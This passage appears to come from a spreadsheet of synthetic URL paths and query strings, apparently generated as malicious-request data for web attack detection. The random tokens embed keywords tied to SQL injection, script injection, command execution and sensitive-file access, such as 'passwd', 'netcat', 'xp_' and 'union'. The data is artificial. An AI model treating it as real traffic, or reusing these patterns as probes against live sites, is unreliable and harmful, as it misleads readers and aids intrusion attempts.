    <t>/le5yppeofmnxyqusljm/aseji.php3?wfswxlt3h=591&amp;eae=55&amp;oxfhsdssl=|tinputte&amp;uen=@b&amp;yono=enereon1niknmasn&amp;ilctmmzcnelsho=i+0dnvo1c%&amp;gicroymre=9867&amp;eea=v&amp;ddprsqem=6351&amp;ftm3oaa=79r2cxrctrssaparbh&amp;ma9nrysee3leqt=ap8w&amp;htocma8ian=00@yq&amp;wdl7chnvteee=dm</t>
  </si>
  <si>
    <t>/edinclude7dnghbircw/dp48whnj0wy9m@a/@76@groupbypassthrusock_streamb/ndeettmtmcddea0lkle.shtml?vecahfe=6244&amp;7xlsr=s_m&amp;jdinsertu=7737571&amp;hh=8350393</t>
  </si>
  <si>
    <t>/ls2cj_tampljgxx.js?bo=iraettsohfnhnz7gio&amp;8gszezt=l3|rj&amp;fzrcdriet=home&lt;slt&amp;estad=r&amp;ukwd4kj=hsease=z+9rm@ts7|sock_streamci&amp;rtfrt1oda0fs=fofcdoxv&amp;eiitoenwee6bu=anwltozj+</t>
  </si>
  <si>
    <t>/hl.cgi?trur6y5wrtle=ifo&amp;nieetai=toqr&amp;jicdo=l&amp;anetbagrr=991614&amp;stseeuvnt=6086628&amp;et4nhidihbrwha=h8u&amp;em=euunletlgr6sshio&amp;bw1ei5nn8nor=+bgsoundm(nhy4v&amp;pnmtieothbf=rqebgthbpte&amp;d8tygefpannha=l7ooc4ef8mjiui&amp;y5hskyxgtg=259371&amp;rra=6&amp;bqtos7hnud=90194597&amp;5jsc8@x=05104991</t>
  </si>
  <si>
    <t>/aurbue2ehrctbuode/w9raq/ebonp4ictrm32atnw.exe?tlxodibpb=d.b-clqweju&amp;opphw=9782125&amp;cin5=gdpsnbeurssaps&amp;teo2ttc5dbia=l+tei&amp;dydtidohe6osfhr=ohauaaptes&amp;tdanyde6teftc8e=trerm5ci%loandturu+)i</t>
  </si>
  <si>
    <t>/nlb/e6m/thrgyd4dria5bte4idz/iennehnd/2n0wgdlhrnud1lh7/o7z-edq/fzvls7aetxq3a4b.png?seronarla6opot=ls-sfyo&gt;ntw&amp;ewealmaagketay=vx'ai6e@6e8as&amp;swsdstonoe7asek=ilud1mo1</t>
  </si>
  <si>
    <t>/p@51gbqao/h8-egcc4zp1/ezz7/67wahbxgrkgeqi0/z7cy_ov/lbexecc_2kmetax_1tq/lb0m/ifwfp0_5rj6kei3.6/a2oocali/lboiaedaoaltiwxdotcd.asp?iidrnat=ewutyr&amp;tdqscde=97552802&amp;fromrpqmamyzwherej=gwldephtit6&amp;4einrhordf=ebhr%at+betweenel%&amp;anteiomalhn=atctsne2chi4st?&amp;yu7dez8pi=84857111&amp;heeblrt=5</t>
  </si>
  <si>
    <t>/ra/ne0kksystemdr4i5imgo/h7b/4er0ennoawtmeew/9o.php?x9rkwmkon3pg=65&amp;e7i3etev=mastbeitsaqlq&amp;te=8hegeie+tmur&amp;oecngse=ieauht2igdr7mvsin&amp;escozddxr=no&amp;mrwindow.open5mochawlinknei=tiqi0&amp;v.child3=csetfpreplaceinputet&gt;doosf&amp;9mct=er6k&amp;ecsn=g_yjk0&amp;vov4tp=mpscriptliemn&amp;jodeionh4ms=6229547344&amp;soctcad=[inntmpsdocument</t>
  </si>
  <si>
    <t>/nibn/p7unlikecalls_y/systemvh-arou.iframe/sehaasrronqydy6d/elod/i7_hgtp3i-dv/nvmphprefjsyz3wio.mspx?mziws1rpda=sn+ez&amp;ahnttdmg=712037534&amp;z@wf-s7@hv=i3aned|53&amp;nrasiohoaiat=wkodf&amp;nogitkfo=31859783&amp;tceq=uzo_nv</t>
  </si>
  <si>
    <t>/e0oa2orxevdp9oar/i38iusaadl/s08d.html?g3skweeor2gwe8h=sejcayau0sjn&amp;saicislrscepah=0&amp;eanqrr=6802&amp;sotsmtegcrne=105313587&amp;hnaihre=tmails&amp;ndjetevo=oie2otf8ina2jo&amp;hrre8=9069245&amp;jzuteeo=rnmleh&amp;k44aorv4trel=sk@r&amp;rneae7r=truma9egx3&amp;ew=zzajtmpgwa9&amp;ueest0l=099220</t>
  </si>
  <si>
    <t>/ek8blyxqc.vnurpa9/4x4echs5tpgatgl/sauiujw9dfc/8@.j-vyclnsdnzcp/feeev/fei@z1gz-dnwcx/eth9nw1mz7alrz_2-f/gcyreutcyrk6admin8/p@@s0ybindqa_u2w/altnvs3nttsu/srdkjobj/5mtrjw.asp?loripg1ywhd=o0ion&amp;tnote=sjnanodptsp&amp;os=noerpiaeefr&lt;eta=e1&amp;em=tvt&amp;dof8nsay=(ear&amp;otbseisue=ptlxeormh&amp;a9eeud=a7autoexeccew;1n$admintl2</t>
  </si>
  <si>
    <t>/eraherr/ebagthoir6wtebrno/9ecyhm1roja/uqrcnph-dnohyf/b7/re/r5w/andn1t/ydk1iinnh/g_ts4/n6f5yyse1v6yqrg0.tiff?nsj14fyt4ndazda=rsexecr++irgymkajtn@telnet</t>
  </si>
  <si>
    <t>/oi/_ay1siwdr-/rmkeoa_apnu/hkms3k.ss1i6/igu.js?alw=xh2ztkhb_&amp;atunkoisedot3r=503894</t>
  </si>
  <si>
    <t>/nmdhnt4d7nz@vf/tbz1/vagczx/iu@y.jpg?ixo=ki3evtrpkcoeneinms&amp;access_logmbybcatj@lo=dlno1edia&amp;c3yeytasoett=0833273&amp;ed=4882&amp;ttpwzoagnhsw=7lzet&amp;ddznfsg=97316103&amp;tny=maeprtje0hpmylofie&amp;vglmimgo=1990750&amp;sniwohrrrs=73&amp;shhtertbnriam=04&amp;e9ea7e=connect0+&amp;t2igose=7986&amp;trerncmtu=027&amp;nwo=9857850</t>
  </si>
  <si>
    <t>/otoeedkgtbedneht5r/whrlaniecyalypt2oa/tiittisorildnts/lc44zrax26j-/0jpfxesxa@gvog/a80m5drooetueetpsen/jubfrnuhaorl.swf?fsjoatwae4=ocic&amp;oveste5=;staw&amp;5oenorrebzsa9=)d+viia+8twa&amp;ecc=3971&amp;tayfiobsi=9888&amp;gtzfwn=58</t>
  </si>
  <si>
    <t>/e0melne2uer0oafsotwe/o4sazqpfh_ks/ieyslbizyfu4o2zs/4kzzperlcjwamhzbm/nwipttsnnnoag/qfn/c8i.jkt8lmm@/y4n4eb4e5/qyhxmlpxfrmis/nsedsife.php3?hrdrmero=&amp;tmpe&amp;nm=&lt;/&amp;ooppckk1yoeasw=abtb1dkohav&amp;initoga6=3$qr\\ol</t>
  </si>
  <si>
    <t>/wtg9/maee/azydoefsrdtpevetuih.bin?ejan=lgk&amp;iuieo=58631972&amp;ahdraph='yn&gt;tsste&amp;geyr8_vch8pselect=erelw&amp;c2dimgtimjne=qdas&amp;mc5=o2bnetcate6+fpntret&amp;rdeog0rth=sduje</t>
  </si>
  <si>
    <t>/aa8lf/clr/ig3f@/access_logistdinx6htpassduevfj0hm/suythamin/eqfs2reezninhcgv/hlh2ce7qtllwvzpd0x/li8emmixet/syrs7c@h0cp/ltewdi4hs3ehrctrsa3/y3xdn0-4uwul.js?gbrsitnreirs=4&amp;lsvdq=7008530004&amp;yzemoea=l6vpep&amp;8uiasodoaean=ee&amp;oaemduotgmhi=6p]it&amp;nbat0e8fsurd=uhtpassyouxmeta+buutobjectstyle&amp;binoi9sh3pji=eprhndh</t>
  </si>
  <si>
    <t>/notrqaoanobneurhtvn/tnl9ecnemts/tstnh0uo8hrbyl/bp5x/mtstseaninemi/pmpuej.swf?rrxonemserery5=ytjyprocessing-instructionn&amp;6poa=861402&amp;retsiattoyihh=tdhsxav+t+exen|&gt;uy&amp;mfesstoiws=sksot&amp;ybynzijhome=eleopteh7edfnnsdt&amp;npcewuru=pzasenhdt</t>
  </si>
  <si>
    <t>/nl4uoa/ehildaernidr/e9haz0mrernpeeo/n2@c0ogeg9uc_8fa/l9cdbeisorhlsmcs/e-dzhs1rz@krticrsb/won0ovdihiunysvi0el5.jpeg?seii4aswelus=27547793&amp;a2olt85=palu=;h+&amp;+ertmpev&amp;htrg=hcdoa</t>
  </si>
  <si>
    <t>/eaad7/bkq7w9x_zu/thr8btu3twhndio0snw/ylth5ea0/nbxq@2hqrnljje/i-opeohj/wpseug.php4?om3lihn=+ra&lt;e2m4ysde|c4node9eumocha&amp;en5vealcipdq=msjnbonwindow.opendetete;ois&amp;as=uo@;erdjseeee&amp;pentteun=diq5qzzy&amp;oenqirotrs=iupyk1&amp;-@fcvkhbt6=sht|ejaurjv7t&amp;6fiei46sdobjectr=7hmlaa&amp;toif6uiot&amp;sqohfiotc9osor=lt&amp;dru&amp;inputycobjectughb=dupdate1ee&amp;sbnuydlimr=nff&amp;+sretughit&amp;4nodivo=le1mbfs&amp;sto6isaroob=2713190717</t>
  </si>
  <si>
    <t>/znfodbzik385e/rnq5lk6pp.sh?ecd3=et)qeiaeia)dsr&amp;bhlubnelih=9&amp;laexjt15ls4tx=3&amp;vniet=60477637&amp;tnsriahdd=a1t&amp;e6cid=cnsc&amp;eln7=2948066&amp;szdcne4i6gk=7&amp;lxcwr_tdiimgecho0=yptemg&amp;htwbethpwo=409&amp;oialrosa=30927&amp;__xfxd.punion=2dtqtg&amp;2qmua=2</t>
  </si>
  <si>
    <t>/s_zpgmtqv/gsn3fsieiosaenrecc/tshiep/aqlnssawaoe/c8j5ugx/unph-httptld.g3@%udw/zm9ro/wfurhhjcgj8kp/quqpmth1xuj/dvnsovgeerbosm0/loebonojsf1l5h/nq.dll?reoreotatarijo=eo)ugtelnetlriframe[evalcw&amp;u@u6u=tofitn5hti0&amp;1connectvim2g=2xfcelfmq&amp;wveivht5ntes=ehv.mrco&amp;8o30=ekiwthgl9f&amp;hofh=zhd0smlili3ag&amp;ian=qaerg</t>
  </si>
  <si>
    <t>/wezvicjiaftpu5/4rt-g6fd2c5/tzn1raxewngbyqln37d/lx4a/sojanseoevtslatt/ystgmho8n/hw95dseneiietaiue2.css?mtduoaltibioq=71210335&amp;ddthu92m913=099989821&amp;mrm63eza=753461013&amp;xvk.ainidu6=3zsnbr6o&amp;hna9tuuntl=f7uv</t>
  </si>
  <si>
    <t>/erjc-aa3hcmdzte-zcm.jpeg?msnbrmsehhgk=ilt7v&amp;wbrntxzuyopenw=aljktsaeo2+sscriptobjectb&amp;2wv.ob3q=tztlcl+nrie0mr&amp;nma2a=201&amp;ewxmrt=pnhtucsyhmaednato&amp;rtveee2=047&amp;u42ieap1=0sdnhg&amp;gefge71attgu2o=frw$e9ein&amp;ghm2piuedes=see&amp;vbseotaddee=9e</t>
  </si>
  <si>
    <t>/1okst.aspx?nyprocessing-instruction8jegt9=r80v&amp;dilq7tsecs=3313761&amp;omelgg=7&amp;cl8rnw=logp&amp;dsda=c)v</t>
  </si>
  <si>
    <t>/tpupqmroeiets.shtml?7d7uhiaf=eiestondt&amp;r'oeee&amp;djkb0u7im=s5uz&amp;3amhietm4d=y34jeph5nrftra&amp;m8efuhswo=67&amp;vliacn3ymtdi=2dokk&amp;esock_stream9tconnectj9mh=516</t>
  </si>
  <si>
    <t>/euvtltsrg/cbgsoundkjtb/wwb04livj-m/5y1p2u2wskvhy60h/o7/hshbgh/hpxiepl8enwencl/dhkhtacceshmbqw_form/zjxjbfrompzrgg3c/5itasoalpo.nsf?nisi9tenvno=(y~e$oeeqdnmno&amp;ncheeiteeedah=]tstutdocument&amp;.6f4eh.oy=eeuar5aat1runtrnt&amp;den=ib3nul&amp;9nopaoco=xtermhe9+ltat2aet&amp;sneqsu8teae=wai=td&amp;nt5msoiadao7n5=75&amp;stxmbg5ra=+sqf92&amp;dh=d8nem&amp;wy716mrggxgiy=+hceacceptlocation@ceie0yshutdown+ue&amp;esdarnnii7i=rs?e+goc7t&amp;qsilnoejottrti=tcehbi+upg9iq7&amp;h2ttee=tyt&amp;dt=etsnrudhseaoevalrb&amp;rngnaloq9a=mdclb6ur0o7n</t>
  </si>
  <si>
    <t>/ea3oj@9m/amte9de8ob/sn7doodgehusots1me/s7lvsoicfepagzwtetj/uf@zo-/j9w-/b0i/rrgtjointeettnp/eikljlyjicb1xzy.exe?bnt1rexehk=acyn_xsn&amp;kffkqbhb=491139&amp;uaeieoejjrl=9639164&amp;okbtcnae2t=nsn&amp;n9hx4nhetohro=ei9a&amp;co2hhseue=pswnq@adminlhreeis-&amp;reoezrlbt=h5erhtnnekflrauos</t>
  </si>
  <si>
    <t>/gbf@em74-nzdkcs7sc/9htzoeotgeou/pedehot5t/eo31mi7u0hmd2sbmk.p/1rp3qmkqcizwn/sert.cfm?hlass=42153&amp;newsqo=eyoeaar46e&amp;nttseiant6is=unnarsatxrtahiunph&amp;d6t=5392330&amp;eo1tu9i=eu5z0n4sjxf&amp;espusg=orao+sal&amp;smgiigkknbl=00&amp;bpmn=spr\\fhs$&amp;vrq=42et1e]npnnaa&amp;ihdanlie97h=otd&amp;tliiny4lqatstlz=ereplacet&amp;ieadnlondoadeo=062499</t>
  </si>
  <si>
    <t>/omqjyzetmppa2bi/t4sdx_4gk@uy/osaaeslbhvoet/teduldivyiju/u7/pk5vhg6/fzt3ayesemo/tasbwtsnlios.php4?ecktoag8=31735&amp;schhee6asruo=sttas&amp;kmeoeagp=a&amp;el=1&amp;noemb3i0atj9i=n3%pecw&amp;ncyufhiaes=7394282&amp;to=iuweoj&amp;tip=6288&amp;mnw60ediemmpue=fn2ort&amp;nt=595&amp;itseuvsygrlho59=sak2kernorazonts&amp;wm8eg2g0a2c=4ueayengh&amp;5nrb=maxte]?tmg[tl+u1&amp;d0mnrzao=itbmv4er1qtyspet</t>
  </si>
  <si>
    <t>/i9ywcajktwqapc/rlpxnohx/0u4zzpkvcmknemx.jn.swf?ntelo0oe=32017&amp;4cshao=54&amp;1saefot9moyaisa=898067&amp;myssnere=0170&amp;ttorm0sdeben=thta0taixosegc&amp;tekboodrceueejy=n3noubt2wrc&amp;pa=/xtyccgbtrlpiratn&amp;4rangh6entgrsz=934</t>
  </si>
  <si>
    <t>/mbpavle8qqcnpf8vry/44zvj6g6aviu/aw/oxxlgmfpr/djoc.xdubjqi.gif?rng1ookin5trm=851433&amp;tasa==why&amp;evgeaigttnudb6n=923962629&amp;xrri=irxtermo</t>
  </si>
  <si>
    <t>/i_0lpnxy_0phgfb4yol1/es5t-tznd/stdin0imetahttpsta0/lkmpcb7fvolhki/cgdiefnejnatjjrpait/o2dsol/arhbe.asmx?ypstelnet8wyc0ojtc=41590368</t>
  </si>
  <si>
    <t>/ssnm2f7/ouqavd1dfehwbkt660wk/iaasbrh/lxg/odtulwenen/jtmk6mu/kgblczbzv4lbfg/t5/sf/nor/by3tphprrda.asp?proo=e7psra5&amp;miisesrh=mstiwoninfrn8dsr&amp;be8ovtsear=xio&amp;ger3yy99=433</t>
  </si>
  <si>
    <t>/essildabmatx8montam/gypbof/m7bc2f8h3isfpfui/j5tas0rp@/iri0mt/nvz-jbv.css?nmb=a&amp;mnaadiz=ehtd0odl&amp;oncemfsydeo=14202&amp;5hde=uo.&amp;smcmochaandtmbs=eut@9v5ibr&amp;xynde82dcshgct9=59291106&amp;pyritenboaoo1h1=sx~+&lt;sda&amp;fahh=cet+6epf+t6&amp;e7uc8qeoloanm=osai&amp;1o9odvrdo5=+rmarurw:+nwoietn+ti&amp;7be=511&amp;teeeny3=oahw&amp;hahpfithabykhca=02</t>
  </si>
  <si>
    <t>/azgj5blo7og1o2mq/ah5aj9gkrogrglvzdu/chitl5eil/5iainuweyies2znuhaxi/hnuiqfb1s4l/usrx8tuizkl85syr/mvzbfiajmalv-lvgrut/miocsyed/g9vb2i3gkssolvt5/e8.7zb6nyivfndo61/egdleyjwaineh/deensn0rsoilo4m.js?ultetreafya=rylregveueehah&amp;h7o=37582</t>
  </si>
  <si>
    <t>/.1rhnpvarez6@/avcyonssi58vcd6pt@g/7xr@vyknrok8vq.jpg?oaera3h2itoh=060164&amp;ijtthtrn=tyj5z&amp;s1nitmysg9um=bo&amp;eeetvag5bxsw=aelllar&amp;mohqqnxh3tnatso=69&amp;cwi4tic=4eaiejcaofe9e5s</t>
  </si>
  <si>
    <t>/txi/3-bjiehyc3jfg/wlivnescjamtu/i2/eeoaisomhw07eol4al/q0ptkdropv/iw/0uaqghe4x.u-x/ysik/ty_@cqhkvdpwdnuqbq-a/tweussop/hjfznvrbglm5bu.htm?neiam=rd++et&amp;iitmsa2eah=shxn7iqnkq&amp;oihisbeqemetf=%nboot.inifaapii|&amp;ehi=6026&amp;mcfa=r+(lr&amp;seaae9avyyq=13644840&amp;5ovmlopgzz26=)br&amp;cdhypyze3e=578186&amp;nn5orit7=leeem6ertvtnntad&amp;dy.u.w1fromctmp=nnull&amp;jdnfeeeame=165824993&amp;umutedi5wart=r?te\\ltt&lt;rlae&amp;ahjniha=ghttpeoooaiamg)ins&amp;orxetes1epuatim=nsl4soabipt9ni</t>
  </si>
  <si>
    <t>/ywheregq1or1vtz7xp_@9/arcej/hlservices2po7o-uc/ow/3rbidai1mhrudpliblml/zkg@jp@okhzpj/05ok6gmt/4ttgedrop.htm?cacceptm@ixs=0zucx</t>
  </si>
  <si>
    <t>/rcrqupdateaoiqattinclude1u/5zwy1sj/wacv5atxxu6vkyhb7.jpg?isen1b=2135&amp;oteoii=08202597&amp;nomneu7tallwau=7197715&amp;httpfe28hiduauso=7servicest&amp;oe=logmhobject'2b&amp;rcor=256&amp;rxrsaoson=2053211&amp;eaueanfrmkene=589162&amp;g1cij=0&amp;socs=b@vmw&amp;q6jcrl8=eueaomrdwraoup&amp;8ovlti1stwe=15&amp;hogiwhb=8594690789&amp;ezat=@\\+3ins=e~flb&amp;seasn1taroehtb=omoem7lpbm</t>
  </si>
  <si>
    <t>/ajqvuv9c_lh2hrhv_wh/aitehvouoriwh4balys/utoezax/heisetnrnq2/ntessoqn.png?ty_1nynodecza=wxtawdnyn9&amp;8v=ndmochamevte\\l&amp;nrtttmcnwp=31915838&amp;nnaehnraead=2d_sn&amp;gnremu=87&amp;eetenhe=536&amp;hoklao=ar2oozfanrgel&amp;nohr2udlu=rarf&amp;iwlo4=adrsdn</t>
  </si>
  <si>
    <t>/euhnrhrixe/6mp9or/okybp1p41zdtjhcy4/etswrn1pnd6/sam5.asp?v5=+iconnectng5+xp_union</t>
  </si>
  <si>
    <t>/ue/ngtj@iibkucpul@e/s8prbntacl/mwe.r.7w/taz-nki24z/knhuvaixa/e1l-mwvk874/tjwpasswd/y3iegsluwole6.php3?nbeebmqe8wt=l8sa1sxp_t@sxi&amp;ndnghi=4yw</t>
  </si>
  <si>
    <t>/xf6u.mlsclocationfromu/tizgl5iz2a/e-8r2g6h97j/zhosmidklnetcatixr5httpsk/7op82xpmaxuqcpj/ob3021z/wxm/t1uaceutonemzmne4/cbiyit1as6/urad.php?wae3u7sustir=67030&amp;o77btearosm=ufo4ayaefta&amp;ehmidlp=6o4e1zenrll5lyad&amp;ebadl=aiq&amp;ds=liee</t>
  </si>
  <si>
    <t>/lllyol9elotm/hnz@4bi1gu89u/snm@zc-8miu_h0vvwtx/hkpcd/he0dgeqhhrnp.css?z9blxba9prswcex=%nsdtdt&amp;wesgponojar=4ini&amp;hhlatreyljaaayu=@&amp;terxsaita4=93938&amp;8jhsolu=42&amp;fesnolwsaum=xmalrselectnusrd&amp;ee=790550&amp;rd-eevrpf=2045903&amp;1ri9kqcni0etv=itlsb&amp;sytsnojn=?ib+mzt+njsuxd5&amp;es=select7)e&amp;2steeod=oodobiicgmm&amp;x2usohieept=@nde$</t>
  </si>
  <si>
    <t>/rjhc0p/dqj2fmd2ote/1ex4kfjwm3duo-gf2/lrg1nc/j0wxthw/wdvjfinh6v.aspx?torsayiss=21096355&amp;7dhrcnbe=esas+t</t>
  </si>
  <si>
    <t>/hitcsv/edq4kjuid.5sn/eeatjseedngico/t0rjfaorse2fctenao3/execzk/ldetd3gamneg3jeae/oefbteehlo/dn-/tieuen8nv53doe/cehvtteutm/sn.aw2fyho5jzhbht.php3?eeeumlglieph=rls\\&amp;osersjneftndic=ysnl&amp;ptsoee3t=[adl&amp;sadatyiaovr=sc&amp;craett9shnh=217191529&amp;6dc.betweenx5=84&amp;exwjd=009560&amp;rl4lf=aooi&amp;aad9ia8aui=dmc4ohngbe&amp;roofeofeuefh=a7l%utowdd&amp;7u7tgc98iisi=4&amp;cg8e8=9535&amp;ooi=oeupf&amp;lts=oshutdowngitorei2qn</t>
  </si>
  <si>
    <t>/zdr18tyx/05eiscjwj77atsr/aixxmwq/qdttnennmcewtbhsmoeh/gaatdcsoabettp/frommd-wkdr3/eeecat1wi3n/8ogx2m4ap/reie/rakf4sedqgskn0vriwg.mdb?htkw=t+&amp;oieytdte=xrmr&amp;sn5mosrg8szeo=krssy0ti5&amp;ongdwsconnectyvid=it&amp;t9s=t$'87gti8&amp;in0dhenmviby=76&amp;adusd=x&amp;jobiesl=370&amp;8hre93sgwheogef=exr1bgjhy&amp;wtdoohucarn=txcsaheloanrsol5&amp;03peu=84&amp;catbxltcdeqdi1=z%so2i\\utn8draziainsertk</t>
  </si>
  <si>
    <t>/5j9krezlyvgsmbt/eez/wmmorhpead55a-b/3ip1wymdb1f9jucerki/tt1/nbw67sxees@he.asp?eej=mucev+&amp;65earee=45764027&amp;vc1attr4plet=344t&amp;y7acftftp=crcpoeoptns+wd[sens+aa&amp;peroeh=39280&amp;zl4cnchmeps=1&amp;reeriarresuner=eet2amccdiua5mta3o&amp;aeagoeaa8jab=9837518</t>
  </si>
  <si>
    <t>/drfqhne0w.t6dm-oo_h/f6from@rxfromxjyiveu/gpasswdbm@pqchnz8selectscript/dbdrssxz@mdrf_-/trswitwouhatoodl/ori5rn1nyoarmonet/uk@qkcivwmdzfa/5oqs226mcqlo6/trtaaaku/uonosrqbzneehwih0hc.cgi?pr7mltt9e0t=89&amp;x5ghfnua5u=7rmemotlaksn&amp;ueg=awlduwh&amp;urluw='z&amp;esgpwnta==sun&amp;yotlwuratms=gi+m1&amp;wbajc82jec=81071&amp;tve=e0tmgy9qq&amp;ueths8p=nu1k&amp;sjrinlasntteott=04009508</t>
  </si>
  <si>
    <t>/qfqubk6wrob/etdgciwlie2eahhf.php?qewk5hyewjrl=u9zb&amp;vno=er&amp;tt=eadali&lt;e$@af9&amp;2pgseh=ujjbvq&amp;aioonsiot=489555&amp;7ijaws6formbfc=oareye3e?'oo&amp;issetdbrjlfl=xtermaseposition&amp;cwjnosatil=ot@nj&amp;ner2naenr7ens=8&amp;2hwu@jel8fr=a)aoa+ermn0rl&amp;a9iyoiisyle=nt%:ej|echorsystem)lallvbscriptsttso+&amp;aidlerc=ltoue&amp;wgo6tmkdlej=ess&amp;iin=687342</t>
  </si>
  <si>
    <t>/j2sceliesrj2e.php?isodh=w&amp;0xtermh%u=74158&amp;isienssbi=76255084&amp;13uformp2qt1hdo=whhrdpvc&amp;e60himn=nulltmr&amp;hs=dngroup+bytuj=ieeho&amp;nagoe0er=iqk8\\</t>
  </si>
  <si>
    <t>/sthndepbs4hf7eble/y5fx3qsjcyfbvx-5z/nans/e5_y3jfrjqa7i/stte1ee/rtsnuc/mncfush8t/j_qgqukvhkgo5z/t@execwf/slohsikthe/hushdhsccseset.js?nsaanzd=ti4vx2jmhl6q&amp;mnveclg=1&amp;gnse=toomieelsrtngh&amp;wlytmponce@ii=nwcn&amp;6eousvselueeete=d.5&amp;e4eoohrsesckotn=0347684</t>
  </si>
  <si>
    <t>/bdunudstxwhyattusa/hl9/nnnpmixn8ho/hmadcyh/rfmunc29guuc-zxy/rc8.js?ppaqrot=7617551&amp;7jtdelhnas0=e5ml6&amp;genlwbjxevte=am5sdnsgnoeavc&amp;rshiaenbilsov=9058836&amp;tiineoeitnlroke=i9tv&amp;tw_29pbhb=4274&amp;esnoae7it9w=93&amp;di=etohandaexecn16</t>
  </si>
  <si>
    <t>/hlemshpki.png?ts=sssaoaah4ely2egn&amp;n6ihrxtce3=eggnro$bt[e(ih&amp;wutp5s=0114&amp;tneds0=e-clmiv10d5n&amp;qffe=o\\roeu%&amp;4totei=68&amp;ic=ego&amp;e6sxruft6e=a6e+m&amp;osge6=e@bno0cdtshutdownlb=isa&amp;snoe9eo=btsesnoyga&amp;ep3gvwr9h=o&lt;n~oevary]tyau4c</t>
  </si>
  <si>
    <t>/rmh5djgnul254j/jqscriptcarsystembwgethl/hnlcyfp/koeegi_qtelnet/ns0.swf?lvrt=5th)+oa+nuoip&amp;ftsropctdel=2985582&amp;lsut7bjrfttoma=rra</t>
  </si>
  <si>
    <t>/nededo2/fiy1yxxlaux_-6/mc8bk6cb_heinc6mhpi/8rr3anir0o.bin?etr=ecsateeaacnglthexn&amp;hpwd99sdh=ciyps&amp;c4ke1aig=fsgjojfq@i&amp;hpere=73089595&amp;st5nkl9p=rufxf.l&amp;bmdlb=ilnssenaiu8jzeh&amp;ettsuie8icoae=(linkp+oh&amp;bodyza~&amp;i7ofad55d8go=ed</t>
  </si>
  <si>
    <t>/ddeje.msf?de=662537&amp;ndmetlrlo=eeiemesltuoil&amp;ty=ifngeaww5irhss&amp;keeotoent=n&amp;6c0nidssrwema=3position9lwinntzee&amp;m8ej=stfieee4jsoent&amp;m9lcrtwqb5nknsg=s&amp;f|ihnaf9</t>
  </si>
  <si>
    <t>/ak.wrsoj/@bitelnetarwxk/aeog1/alaofboagy.exe?ismsrf1bi=1hawd&amp;episepe2attrhop=oboadse71xogot9sta&amp;7eaa=n@+&amp;eunotxpendow=v342@&amp;yotf=se6connectv/@etno&amp;hg6etptk7osreog=13197075&amp;6phusyo6dfy4h=tt&amp;oynagrtiaetw8=&lt;eris&amp;selstn=9&amp;3iupd7te7od=gt=&amp;3oonnutdyei=5013</t>
  </si>
  <si>
    <t>/tii9tnnniy.dll?rr1yovnci=lqta%kydmrt2ew$&amp;nasnh2m6dmolo=p&amp;rvqm=]eta4es&amp;a6tup=i8wr1c&amp;iht=8</t>
  </si>
  <si>
    <t>/aq7gfnragnqsgw/znh2gnwodhliid/3dzr@qj7fnvdvoz_0/htpassjae3phuniondd/eutt7naoclo8obopkh/slolufxso/s-a_o@9/pqcxcavhks9ook/mh0uvhqwrbqb7s.sh?u5scriptvmetclyzg=87909696&amp;3tivnuedipsortw=sgc&amp;nyhrgn=dbodyolhttpserddef+i&amp;tahorbtaitosnto=dcxse1eriehot</t>
  </si>
  <si>
    <t>/i85rpgdw/to4lkf.lp/elald.js?seo6nwiresb=oenraarnrprst0shh&amp;lhene=96&amp;esg5tloeti=mzegefuqla&amp;itjreesiltdexbe=6zdel5stcqben8a&amp;et=feb3e&amp;mgwp-ayuzxtermm=+i++yaccept0i5;linko=2es&amp;uaigcat6j4-=5&amp;osgt=logoadminm'o+t5/9e'eo&amp;hrldsccni=3607</t>
  </si>
  <si>
    <t>/oxcmwovohveyi0fo/iepfgnmenretcctmn6eu.asmx?tmlnpnopcj=t&amp;&amp;pmgmcgexech=0&amp;qexlike8zz=lhqg37f31ig&amp;uubttin=064&amp;eo9a2me=eoe0mouet6imaw&amp;hwhqf_=otatvfa4</t>
  </si>
  <si>
    <t>/xjn9gexecvtr9/2z7ab5ozvu8zlr.dbe5/tel/3etkthls/dp9gkrhavingyv.css?esnl2cievtao11a=e9&amp;vlp-j=n96m_thxo2-&amp;t2hsndauerh=miframeeie9uj+n&amp;8iu1eoew=69064906&amp;bdinrrnats=291&amp;nepsgse2=76824&amp;ltheerssgeesqie=fnaon&amp;r3ron=ohw+n'logp8ctr&amp;adwo=s4nrenen&amp;epnlinl=lythienebsh7lou&amp;surtr89czhc2=soh</t>
  </si>
  <si>
    <t>/oxxv3jpj9bo_tufxkam/eglltiuremhwsda/6ando7s9rr/ibzstonzq/i2ft@uqrc/du_atlb1h.gif?tro=hhiedtooli&amp;miuaus3stoliaa=2734627&amp;vselectuvf6nq7netcat@=+es&amp;5ewidingia1e=ot&amp;efletb4=;escriptss&amp;po=nxrnph-nd++y5&amp;ralrrer=+p(yconnectat&amp;5ubnian=+t]&amp;e0a64tttovors=%l-=d&amp;hcheayjdnao=rpnph-oa&amp;drokescrt=90575&amp;ieaii=v</t>
  </si>
  <si>
    <t>/hmdpdoebdleem/im5ntlmeqte/ovtfzp/ymjihfz/yujk11yvyh8hfnx2ca3/iwx.jpeg?2u=ic5idt&amp;0rss4srs18br=xrkunthgek2exty&amp;lmdacsoraa=+c-7faw&amp;oe=royx&amp;kw6ea=raccess_loge=;hed8</t>
  </si>
  <si>
    <t>/ovu7f4ruthdxwu0oujto/p7ewcgu/naxqvzhcvd.q/ujruc3kuroan01r7u4lb/bgsoundv0meqx_an8/h57wcfwtb.cgi?5r=31&amp;xwylrfoiyz4ia1=7&amp;vz1skrf=229&amp;ctrtnjueasne=wa1?1nipilibheht&amp;lpbyideikptt=cjlsh6eoerovled1aa</t>
  </si>
  <si>
    <t>/ew7zfpuhdrecajaq/f2etcpositionribetweenhdbem/tifmh/citihvebaajikq4n/p8nhcsnnset/tewts7ejt6tlsos/ig2.uekl4usdnpi/ebs/sj/hb4vo/lrp_dl/sfasg7e-ee.exe?eostes=t~mchild]aaytuitsd&amp;hca=34&amp;eelby7festead=581121</t>
  </si>
  <si>
    <t>/jeie1an/wpidhfz6e3tiwisc/@fhgmwphpuwinnt1/nuebjq7ay/gvdivn733jk/gntelaszardhawajzbe/chno6pa@dxkc7z/vf7k8jccatklkg/llixi__-9jh83p/2ehisonn.shtml?kuhblexekxemse=eqet&amp;d9z0lytratnan=77064&amp;oeir=odd4i+&amp;adllletaeerpt=74960</t>
  </si>
  <si>
